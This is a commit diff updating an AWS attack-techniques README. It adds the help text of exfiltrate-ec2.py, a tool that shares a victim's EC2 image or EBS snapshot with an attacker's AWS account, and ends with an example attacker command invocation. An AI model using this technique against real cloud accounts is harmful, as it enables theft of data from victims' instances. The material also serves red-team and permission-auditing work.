Readme updated

2019-12-04 17:58:39 +01:00 · 2019-12-04 17:58:39 +01:00 · 54da016b70
parent 853f891a84
commit 54da016b70
1 changed files with 55 additions and 0 deletions
--- a/clouds/aws/README.md
+++ b/clouds/aws/README.md
@ -103,6 +103,61 @@ IAM Permissions abused:
 - `ec2:CreateImage`

 ```
+attacker $ python3 ./exfiltrate-ec2.py --help
+
+        :: exfiltrate-ec2
+        Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
+        Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
+
+usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
+                           [--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
+                           [--token TOKEN] [--victim-profile VICTIM_PROFILE]
+                           [--victim-access-key VICTIM_ACCESS_KEY]
+                           [--victim-secret-key VICTIM_SECRET_KEY]
+                           [--victim-token VICTIM_TOKEN] [-v]
+                           {createimage,createsnapshot} ...
+
+positional arguments:
+  {createimage,createsnapshot}
+                        Available methods
+    createimage         Creates a snapshot of a running or stopped EC2
+                        instance in an AMI image form. This AMI image will
+                        then be shared with another AWS account, constituing
+                        exfiltration opportunity.
+    createsnapshot      Creates a snapshot of an EBS volume used by an EC2
+                        instance. This snapshot will then be shared with
+                        another AWS account, constituing exfiltration
+                        opportunity.
+
+required arguments:
+  --region REGION       AWS Region to use.
+
+optional arguments:
+  -v, --verbose         Display verbose output.
+
+Attacker's AWS credentials - where to instantiate exfiltrated EC2:
+  --profile PROFILE     Attacker's AWS Profile name to use if --access-key was
+                        not specified
+  --access-key ACCESS_KEY
+                        Attacker's AWS Access Key ID to use if --profile was
+                        not specified
+  --secret-key SECRET_KEY
+                        Attacker's AWS Secret Key ID
+  --token TOKEN         (Optional) Attacker's AWS temporary session token
+
+Victim AWS credentials - where to find EC2 to exfiltrate:
+  --victim-profile VICTIM_PROFILE
+                        Victim's AWS Profile name to use if --access-key was
+                        not specified
+  --victim-access-key VICTIM_ACCESS_KEY
+                        Victim's AWS Access Key ID to use if --profile was not
+                        specified
+  --victim-secret-key VICTIM_SECRET_KEY
+                        Victim's AWS Secret Key ID
+  --victim-token VICTIM_TOKEN
+                        (Optional) Victim's AWS temporary session token
+
+
 attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default --victim-profile victim-profile createsnapshot --volume-id vol-0f340890acfXXXXX --attach-instance-id i-0b359b0fcbcYYYYY

        :: exfiltrate-ec2